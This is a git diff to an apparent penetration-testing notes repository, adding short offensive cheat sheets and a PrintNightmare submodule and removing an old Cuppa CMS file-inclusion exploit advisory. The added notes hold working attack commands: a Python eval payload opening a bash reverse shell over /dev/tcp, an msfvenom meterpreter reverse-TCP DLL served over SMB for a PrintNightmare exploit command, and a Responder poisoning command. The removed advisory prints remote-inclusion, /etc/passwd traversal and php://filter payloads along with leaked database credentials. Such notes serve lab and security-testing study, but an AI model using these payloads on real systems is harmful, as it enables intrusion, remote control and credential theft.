diff --git a/.gitmodules b/.gitmodules
index 3791fbb..4d93632 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -106,3 +106,6 @@
 [submodule "telecommunications/sipvicious"]
 	path = telecommunications/sipvicious
 	url = https://github.com/EnableSecurity/sipvicious.git
+[submodule "exploit/windows/PrintNightmare"]
+	path = exploit/windows/PrintNightmare
+	url = https://github.com/ly4k/PrintNightmare.git
diff --git a/enumeration/docs/nfs.md b/enumeration/docs/nfs.md
new file mode 100644
index 0000000..6efc7c9
--- /dev/null
+++ b/enumeration/docs/nfs.md
@@ -0,0 +1,4 @@
+# NFS Enumeration
+
+* `rpcinfo -p $TARGET_IP`
+* `showmount -e $TARGET_IP`
diff --git a/exploit/linux/pkexec/CVE_2021_4034.md b/exploit/linux/pkexec/CVE_2021_4034.md
new file mode 100644
index 0000000..17777f4
--- /dev/null
+++ b/exploit/linux/pkexec/CVE_2021_4034.md
@@ -0,0 +1,11 @@
+# CVE-2021-4032
+
+* [Qualys put it in the open](https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt)
+* [arthepsy's exploit](https://github.com/arthepsy/CVE-2021-4034)
+
+* Arg counting starts at 1 inside pkexec logic
+* `execve( "/usr/binpkexec", (char **){NULL}, env)` puts NULL into argc[1]
+* The value behind NULL can be overwritten, which is the first env param
+
+
+
diff --git a/exploit/python/code_injection.md b/exploit/python/code_injection.md
new file mode 100644
index 0000000..fc2b2e2
--- /dev/null
+++ b/exploit/python/code_injection.md
@@ -0,0 +1,10 @@
+# Code Injection
+
+* Python's `input()`, `exec()` and `eval()` makes it possible
+
+## Usage
+
+* Payload example
+```python
+eval("__import__('os').system('bash -i >& /dev/tcp/$TARGET_IP/$TARGET_PORT 0>&1')#")
+```
diff --git a/exploit/web/remote_file_inclusion.txt b/exploit/web/remote_file_inclusion.txt
deleted file mode 100644
index a035a70..0000000
--- a/exploit/web/remote_file_inclusion.txt
+++ /dev/null
@@ -1,87 +0,0 @@
-# Exploit Title   : Cuppa CMS File Inclusion
-# Date            : 4 June 2013
-# Exploit Author  : CWH Underground
-# Site            : www.2600.in.th
-# Vendor Homepage : http://www.cuppacms.com/
-# Software Link   : http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip
-# Version         : Beta
-# Tested on       : Window and Linux
-
-  ,--^----------,--------,-----,-------^--,
-  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
-  `+---------------------------^----------|
-    `\_,-------, _________________________|
-      / XXXXXX /`|     /
-     / XXXXXX /  `\   /
-    / XXXXXX /\______(
-   / XXXXXX /          
-  / XXXXXX /
- (________(            
-  `------'
-
-####################################
-VULNERABILITY: PHP CODE INJECTION
-####################################
-
-/alerts/alertConfigField.php (LINE: 22)
-
------------------------------------------------------------------------------
-LINE 22: 
-        <?php include($_REQUEST["urlConfig"]); ?>
------------------------------------------------------------------------------
-    
-
-#####################################################
-DESCRIPTION
-#####################################################
-
-An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.
-
-http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]
-
-#####################################################
-EXPLOIT
-#####################################################
-
-http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
-http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
-
-Moreover, We could access Configuration.php source code via PHPStream 
-
-For Example:
------------------------------------------------------------------------------
-http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
------------------------------------------------------------------------------
-
-Base64 Encode Output:
------------------------------------------------------------------------------
-PD9waHAgCgljbGFzcyBDb25maWd1cmF0aW9uewoJCXB1YmxpYyAkaG9zdCA9ICJsb2NhbGhvc3QiOwoJCXB1YmxpYyAkZGIgPSAiY3VwcGEiOwoJCXB1YmxpYyAkdXNlciA9ICJyb290IjsKCQlwdWJsaWMgJHBhc3N3b3JkID0gIkRiQGRtaW4iOwoJCXB1YmxpYyAkdGFibGVfcHJlZml4ID0gImN1XyI7CgkJcHVibGljICRhZG1pbmlzdHJhdG9yX3RlbXBsYXRlID0gImRlZmF1bHQiOwoJCXB1YmxpYyAkbGlzdF9saW1pdCA9IDI1OwoJCXB1YmxpYyAkdG9rZW4gPSAiT0JxSVBxbEZXZjNYIjsKCQlwdWJsaWMgJGFsbG93ZWRfZXh0ZW5zaW9ucyA9ICIqLmJtcDsgKi5jc3Y7ICouZG9jOyAqLmdpZjsgKi5pY287ICouanBnOyAqLmpwZWc7ICoub2RnOyAqLm9kcDsgKi5vZHM7ICoub2R0OyAqLnBkZjsgKi5wbmc7ICoucHB0OyAqLnN3ZjsgKi50eHQ7ICoueGNmOyAqLnhsczsgKi5kb2N4OyAqLnhsc3giOwoJCXB1YmxpYyAkdXBsb2FkX2RlZmF1bHRfcGF0aCA9ICJtZWRpYS91cGxvYWRzRmlsZXMiOwoJCXB1YmxpYyAkbWF4aW11bV9maWxlX3NpemUgPSAiNTI0Mjg4MCI7CgkJcHVibGljICRzZWN1cmVfbG9naW4gPSAwOwoJCXB1YmxpYyAkc2VjdXJlX2xvZ2luX3ZhbHVlID0gIiI7CgkJcHVibGljICRzZWN1cmVfbG9naW5fcmVkaXJlY3QgPSAiIjsKCX0gCj8+
------------------------------------------------------------------------------
-
-Base64 Decode Output:
------------------------------------------------------------------------------
-<?php 
-	class Configuration{
-		public $host = "localhost";
-		public $db = "cuppa";
-		public $user = "root";
-		public $password = "Db@dmin";
-		public $table_prefix = "cu_";
-		public $administrator_template = "default";
-		public $list_limit = 25;
-		public $token = "OBqIPqlFWf3X";
-		public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
-		public $upload_default_path = "media/uploadsFiles";
-		public $maximum_file_size = "5242880";
-		public $secure_login = 0;
-		public $secure_login_value = "";
-		public $secure_login_redirect = "";
-	} 
-?>
------------------------------------------------------------------------------
-
-Able to read sensitive information via File Inclusion (PHP Stream)
-
-################################################################################################################
- Greetz      : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2 
-################################################################################################################
\ No newline at end of file
diff --git a/exploit/windows/PrintNightmare b/exploit/windows/PrintNightmare
new file mode 160000
index 0000000..5ca891c
--- /dev/null
+++ b/exploit/windows/PrintNightmare
@@ -0,0 +1 @@
+Subproject commit 5ca891c64d7dcd785730c8e6dec87476b786012c
diff --git a/exploit/windows/docs/printnightmare.md b/exploit/windows/docs/printnightmare.md
new file mode 100644
index 0000000..b4f25e0
--- /dev/null
+++ b/exploit/windows/docs/printnightmare.md
@@ -0,0 +1,27 @@
+# Print Nightmare
+
+* Clone [cube0x0's exploits](https://github.com/cube0x0/CVE-2021-1675.git)
+
+* Create virtual env inside cloned repo and install impacket
+```sh
+pip install .
+pip2 install .
+```
+
+* Create payload
+```sh
+msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f dll -o giftcard.dll
+```
+
+* Prepare msf multi handler
+
+* Inside virtualenv
+```sh
+smbserver share $(pwd) -smb2support
+```
+
+* Roll the exploit
+```sh
+python CVE-2021-1675.py GROUP/username:'password'@$TARGET_IP '\\$ATTACKER_IP\share\giftcard.dll'
+```
+
diff --git a/exploit/windows/docs/responder.md b/exploit/windows/docs/responder.md
new file mode 100644
index 0000000..1eae577
--- /dev/null
+++ b/exploit/windows/docs/responder.md
@@ -0,0 +1,10 @@
+# Responder
+
+* [lgandx's repo](https://github.com/lgandx/Responder.git)
+
+Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication
+
+## Usage
+```sh
+responder -I tun0 -wrvd
+```
diff --git a/exploit/windows/impacket b/exploit/windows/impacket
index 10e5395..e007046 160000
--- a/exploit/windows/impacket
+++ b/exploit/windows/impacket
@@ -1 +1 @@
-Subproject commit 10e53952e64e290712d49e263420b70b681bbc73
+Subproject commit e007046def3d7e2afa27dd83cb9e53f452099175
diff --git a/hashes/password_cracking/vnc.md b/hashes/password_cracking/vnc.md
new file mode 100644
index 0000000..9903c26
--- /dev/null
+++ b/hashes/password_cracking/vnc.md
@@ -0,0 +1,6 @@
+# VNC Password Decoding
+
+* Found passwords in vnc config files may be decoded via
+```sh
+ echo -n "<key>" | xxd -r -p |  openssl enc -des-cbc --nopad --nosalt -K 5AB2CDC0BADCAF13F1 -iv 0000000000000000 -d | hexdump -Cv
+```
diff --git a/post_exploitation/docs/windows/registry.md b/post_exploitation/docs/windows/registry.md
new file mode 100644
index 0000000..72172f1
--- /dev/null
+++ b/post_exploitation/docs/windows/registry.md
@@ -0,0 +1,7 @@
+# Windows Registry
+
+## AutoLogin Password
+* Automatic logon password is save in plaintext 
+```
+reg query "HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon"
+```
diff --git a/post_exploitation/priv_esc/docs/windows/windows_priv_esc.md b/post_exploitation/priv_esc/docs/windows/windows_priv_esc.md
index 3ebdf78..72cf0b1 100644
--- a/post_exploitation/priv_esc/docs/windows/windows_priv_esc.md
+++ b/post_exploitation/priv_esc/docs/windows/windows_priv_esc.md
@@ -54,6 +54,7 @@ wmic service list brief | findstr  "Running"
 * `SeImpersonatePrivilege` is necessary, check via `whoami priv`
 *  Hot Potato is best before Server 2019 and Windows 10 (version 1809)
 * [Potatos](../../../../exploit/windows/docs/potatoes.md)
+* [itm4n](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)
 
 ### Schedules Tasks
 * `schtasks`